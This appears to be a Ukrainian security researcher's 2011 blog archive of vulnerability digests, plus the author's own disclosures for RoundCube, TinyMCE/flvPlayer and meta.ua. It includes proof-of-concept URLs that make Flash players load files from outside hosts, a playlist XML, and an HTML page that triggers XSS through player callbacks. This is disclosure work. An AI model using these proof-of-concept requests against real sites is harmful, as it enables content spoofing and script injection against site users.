Архів для категорії 'Уразливості'

Добірка уразливостей

17:29 01.12.2011

В даній добірці уразливості в веб додатках:

  • EMC Documentum eRoom arbitrary file upload vulnerability (деталі)
  • sNews 1.7.1 XSS vulnerability (деталі)
  • XSRF (CSRF) in Argyle Social (деталі)
  • Microsoft Security Bulletin MS10-051 - Critical Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in Argyle Social (деталі)
  • XSRF (CSRF) in Open Classifieds (деталі)
  • EMC SourceOne ASP.NET application tracing information disclosure vulnerability (деталі)
  • Multiple XSS flaws within Mitel’s AWC (Mitel Audio and Web Conferencing) (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in PHP Calendar Basic (деталі)
  • Zeacom Chat Server JSESSIONID weak SessionID Vulnerability (деталі)

Численні уразливості в RoundCube

17:20 30.11.2011

18.10.2011

В жовтні, 12.10.2011, а також додатково 15.10.2011, я знайшов численні уразливості в RoundCube. Це Brute Force, Content Spoofing, Cross-Site Scripting та Clickjacking уразливості. Частина з цих дірок - це уразливості в TinyMCE, що постачається з RoundCube. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

30.11.2011

Brute Force:

http://site/index.php

Content Spoofing:

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Content Spoofing:

http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Clickjacking:

RoundCube вразливий до віддаленого логіну з використанням Clickjacking. Про дані атаки я вже розповідав в своїй статті.

В версії RoundCube 0.6-RC доданий захист от Clickjacking атак (окрім вищезгаданої форми логіну), до якого вразливий весь функціонал додатку. Але захист недостатньо ефективний, так як спрацьовує лише в нових версіях деяких браузерів, тому користувачі старих браузерів будуть незищені. Ну, а старі версії RoundCube повністю вразливі до Clickjacking.

CS та XSS - це уразливості в TinyMCE.

Уразливі RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6). В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Як повідомили мені розробники, в версії RoundCube 0.7 уразливості будуть виправлені.

Уразливості в плагінах для WordPress №53

23:56 29.11.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Zingiri Web Shop, Lanoba Social та advanced-text-widget. Для котрих з’явилися експлоіти. Zingiri Web Shop - це плагін для створення онлайн магазина, Lanoba Social - це плагін для інтеграції з соціальними мережами (такими як Facebook, Twitter та іншими), advanced-text-widget - це текстовий віджет з розширеними можливостями для розміщення контенту.

  • Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Vulnerability (деталі)
  • wordpress Lanoba Social Plugin Xss Vulnerabilities (деталі)
  • Wordpress advanced-text-widget Plugin Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 26.11.2011

В даній добірці уразливості в веб додатках:

  • Cisco Small Business SRP500 Series Command Injection Vulnerability (деталі)
  • Apache Struts 2 Multiple Reflected XSS in XWork error pages (деталі)
  • XSRF (CSRF) in Webmatic (деталі)
  • HP TCP/IP Services for OpenVMS Running POP or IMAP, Remote Unauthorized Access (деталі)
  • Various XSS and information disclosure flaws within KeyFax response management system (деталі)
  • HP TCP/IP Services for OpenVMS Running SMTP Server, Remote Denial of Service (DoS) (деталі)
  • Civica Spydus Library Management System (LMS) - Cross-Site Scripting Vulnerability (деталі)
  • SQL injection in Calendarix (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • Multiple XSS in Calendarix (деталі)

Уразливість на tv.meta.ua

23:51 25.11.2011

У червні, 01.06.2007, як раз коли я розпочав свій проект Місяць багів в Пошукових Системах (де я і про Мету згадував), я знайшов Cross-Site Scripting уразливість на сайті http://tv.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на meta.ua та auction.meta.ua.

XSS:

Дана уразливість так досі й висить на сайті, як це було до того, як я знайшов її у червні 2007 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я написав раніше і про які ще напишу.

Добірка уразливостей

17:27 25.11.2011

В даній добірці уразливості в веб додатках:

  • radvd security update (деталі)
  • XSRF (CSRF) in PHPDug (деталі)
  • Multiple SQL injection vulnerabilities in PHPDug (деталі)
  • Nova vulnerability (деталі)
  • Multiple XSS vulnerabilities in PHPDug (деталі)
  • YaTFTPSvr TFTP Server Directory Traversal Vulnerability (деталі)
  • CSRF (Cross-Site Request Forgery) in VCalendar (деталі)
  • RSA, The Security Division of EMC, announces the release of Hotfix 6 with security updates for RSA Key Manager Appliance 2.7 Service Pack 1 (деталі)
  • XSRF (CSRF) in poMMo (деталі)
  • Multiple XSS (Cross Site Scripting) vulnerabilities in poMMo (деталі)

Уразливості на meta.ua

23:56 24.11.2011

26.10.2007

У травні, 19.05.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на info.meta.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.11.2011

XSS:

POST запит на сторінці http://meta.ua/meta/feedback.asp в полях: Ваше имя, E-mail, Адрес сайта, Телефон для связи, Ваше сообщение.

Insufficient Anti-automation:

http://meta.ua/meta/feedback.asp

Відправка автоматизованих POST запитів на сторінці http://meta.ua/meta/feedback.asp можлива незважаючи на захист з використанням випадкових імен полів. Даний захист обходиться за допомогою використання постійних імен полів (ті ж самі імена використовуються для багаторазової відправки запитів).

Дані уразливості були проігноровані й не виправлені (причому відповіли мені дуже несерйозним чином, після чого я більше не сповіщаю Мету про дірки на їхніх сайтах). І лише зараз дані XSS уразливості вже виправлені, причому вони розбили форму зворотнього зв’язку на три (що вибираються вказанням параметра mode), а також зробили ще окрему форму з капчею. При цьому IAA уразливість в цій формі досі не виправлена.

Добірка уразливостей

17:26 24.11.2011

В даній добірці уразливості в веб додатках:

  • Cisco Unified Contact Center Express Directory Traversal Vulnerability (деталі)
  • XSS in CLASSIFIED ADS (деталі)
  • Path disclousure in MEGA PORTAL (деталі)
  • Cisco Unified Communications Manager Directory Traversal Vulnerability (деталі)
  • otrs2 security update (деталі)
  • Disclosure of sensitive information in D-Link DIR-300 Router (деталі)
  • Multiple XSS and Authentication flaws within BMC Remedy Knowledge Management (деталі)
  • XSS in PHP Directory Listing Script (деталі)
  • Arbitrary file reading and arbitrary code execution in Router Manager for D-Link DIR-300 (деталі)
  • XSS in AJAX Calendar (деталі)

Численні уразливості в TinyMCE та flvPlayer

23:52 23.11.2011

17.10.2011

Нещодавно, 15.10.2011, я знайшов численні уразливості в TinyMCE - популярному візуальному редакторі, та flvPlayer (що входить в поставку TinyMCE). Це Full path disclosure, Content Spoofing та Cross-Site Scripting уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про виконання коду в TinyBrowser, коли через даний компонент TinyMCE можна було провести Code Execution атаку. А цього разу я знайшов нові дірки в TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

23.11.2011

Full path disclosure:

Уразливості в TinyMCE в плагіні spellchecker.

http://site/path/tinymce/plugins/spellchecker/classes/EnchantSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/GoogleSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpellShell.php

Content Spoofing:

flv_player.swf - це flvPlayer v1.0b, що входить в TinyMCE.

Для WordPress:
http://site/wp-includes/js/tinymce/plugins/media/img/flv_player.swf

Для Simple:Press Forum: http://site/wp-content/plugins/
simple-forum/editors/tinymce/plugins/img/media/flv_player.swf

Для RoundCube:
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS:

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Починаючи з TinyMCE 3.4b2, в поставку входить moxieplayer.swf.

Content Spoofing:

http://site/path/moxieplayer.swf?url=http://site2/1.flv

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

Уразливі всі версії TinyMCE, що містять вищеназвані файли. Уразливі до CS та XSS всі версії flvPlayer (flvPlayer v1.0b). А також всі веб додатки, які використовують дані версії TinyMCE та flvPlayer, а це сотні веб додатків та десятки мільйонів сайтів в Інтернеті. Сайтів лише на одному WordPress, за даними wordpress.com, на даний час налічує більше 67 мільйонів, біля половини з яких розміщується на блог-хостінгу wordpress.com.

Зокрема вразливі наступні веб додатки: WordPress 2.6 - 3.1.1 (що я перевірив, а потенційно WP 2.5 - 3.2.1) до FPD. До Content Spoofing вразливі версії з файлом flv_player.swf (в плагіні media в TinyMCE), що є в WP 2.6 - 3.0.1 (що я перевірив, а потенційно WP 2.5 - 3.0.5). Simple:Press Forum 4.4.5 та попередні версії. RoundCube 0.6 та попередні версії (перевірялося в 0.4-beta та 0.6) до СS і XSS. В останній версії RoundCube 0.6 використовує moxieplayer.swf (замість flv_player.swf). Та багато інших веб додатків.

Добірка уразливостей

17:34 23.11.2011

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities in OmniTouch Instant Communication Suite (деталі)
  • XSS in (e)2 interactive Photo Gallery (деталі)
  • Multiple SQL Injection in Shutter (деталі)
  • HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information (деталі)
  • CSRF (Cross-Site Request Forgery) in SelectaPix Image Gallery (деталі)
  • Cisco CUCM - Multiple Vulnerabilities (деталі)
  • Multiple XSS in YaPiG (деталі)
  • XSS in SelectaPix Image Gallery (деталі)
  • Cisco Unified Contact Center Express Directory Traversal (деталі)
  • CSRF (Cross-Site Request Forgery) in FREELANCER (деталі)